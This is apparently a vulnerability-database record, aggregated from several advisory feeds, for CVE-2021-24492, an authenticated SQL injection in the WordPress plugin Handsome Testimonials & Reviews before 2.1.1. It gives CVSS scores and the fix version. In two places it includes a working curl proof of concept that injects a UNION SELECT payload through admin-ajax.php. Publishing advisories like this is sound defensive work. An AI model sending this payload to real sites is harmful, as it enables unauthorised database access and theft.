Description
The hndtst_action_instance_callback AJAX call of the plugin, available to any authenticated users, does not sanitise, validate or escape the hndtst_previewShortcodeInstanceId POST parameter before using it in a SQL statement, leading to an SQL Injection issue.
Related
{"id": "WPEX-ID:42760007-0E59-4D45-8D64-86BC0B8DACEA", "type": "wpexploit", "bulletinFamily": "exploit", "title": "Handsome Testimonials & Reviews < 2.1.1 - Authenticated (Subscriber+) SQL Injection", "description": "The hndtst_action_instance_callback AJAX call of the plugin, available to any authenticated users, does not sanitise, validate or escape the hndtst_previewShortcodeInstanceId POST parameter before using it in a SQL statement, leading to an SQL Injection issue.\n", "published": "2021-06-29T00:00:00", "modified": "2021-08-12T07:04:19", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {}, "href": "", "reporter": "wpvulndb", "references": ["https://codevigilant.com/disclosure/2021/wp-plugin-handsome-testimonials/"], "cvelist": ["CVE-2021-24492"], "immutableFields": [], "lastseen": "2021-09-14T23:16:42", "viewCount": 35, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24492"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:42760007-0E59-4D45-8D64-86BC0B8DACEA"]}], "rev": 4}, "score": {"value": 5.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-24492"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:42760007-0E59-4D45-8D64-86BC0B8DACEA"]}]}, "exploitation": null, "vulnersScore": 5.2}, "sourceData": "curl -i -s -k -X $'POST' \\\r\n -H $'X-Requested-With: XMLHttpRequest' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Origin: https://example.com' \\\r\n -b $'[any authenticated user]' \\\r\n --data-binary $'action=hndtst_previewShortcodeInstance&hndtst_previewShortcodeInstanceId=-5049 UNION ALL SELECT current_user(),current_user(),CONCAT(0x716b7a6b71,0x5a4a547a475a4e5657516472454b4d4c524764525a69416b7a767961715957584947776954594d4d,0x716a717a71),NULL-- -' \\\r\n $'https://example.com/wp-admin/admin-ajax.php'", "generation": 0, "_state": {"dependencies": 1646147966}}
{"patchstack": [{"lastseen": "2022-06-01T19:31:45", "description": "Authenticated SQL Injection (SQLi) vulnerability discovered by Shreya Pohekar (Codevigilant Project) in WordPress Handsome Testimonials & Reviews (versions <= 2.1.0).\n\n## Solution\n\n\r\n Update the WordPress Handsome Testimonials & Reviews to the latest available version (at least 2.1.1).\r\n ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-29T00:00:00", "type": "patchstack", "title": "WordPress Handsome Testimonials & Reviews <= 2.1.0 - Authenticated SQL Injection (SQLi) vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24492"], "modified": "2021-06-29T00:00:00", "id": "PATCHSTACK:0202C05086E13B058EC63EFAEE29F075", "href": "https://patchstack.com/database/vulnerability/handsome-testimonials/wordpress-handsome-testimonials-reviews-2-1-0-authenticated-sql-injection-sqli-vulnerability", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T14:55:44", "description": "The hndtst_action_instance_callback AJAX call of the Handsome Testimonials & Reviews WordPress plugin before 2.1.1, available to any authenticated users, does not sanitise, validate or escape the hndtst_previewShortcodeInstanceId POST parameter before using it in a SQL statement, leading to an SQL Injection issue.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-02T11:15:00", "type": "cve", "title": "CVE-2021-24492", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24492"], "modified": "2021-08-10T16:52:00", "cpe": [], "id": "CVE-2021-24492", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24492", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}], "wpvulndb": [{"lastseen": "2021-09-14T23:16:42", "description": "The hndtst_action_instance_callback AJAX call of the plugin, available to any authenticated users, does not sanitise, validate or escape the hndtst_previewShortcodeInstanceId POST parameter before using it in a SQL statement, leading to an SQL Injection issue.\n\n### PoC\n\ncurl -i -s -k -X $'POST' \\ -H $'X-Requested-With: XMLHttpRequest' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Origin: https://example.com' \\ -b $'[any authenticated user]' \\ \\--data-binary $'action=hndtst_previewShortcodeInstance&hndtst;_previewShortcodeInstanceId=-5049 UNION ALL SELECT current_user(),current_user(),CONCAT(0x716b7a6b71,0x5a4a547a475a4e5657516472454b4d4c524764525a69416b7a767961715957584947776954594d4d,0x716a717a71),NULL-- -' \\ $'https://example.com/wp-admin/admin-ajax.php'\n", "cvss3": {}, "published": "2021-06-29T00:00:00", "type": "wpvulndb", "title": "Handsome Testimonials & Reviews < 2.1.1 - Authenticated (Subscriber+) SQL Injection", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-24492"], "modified": "2021-08-12T07:04:19", "id": "WPVDB-ID:42760007-0E59-4D45-8D64-86BC0B8DACEA", "href": "https://wpscan.com/vulnerability/42760007-0e59-4d45-8d64-86bc0b8dacea", "sourceData": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}]}
Handsome Testimonials & Reviews < 2.1.1 - Authenticated (Subscriber+) SQL Injection
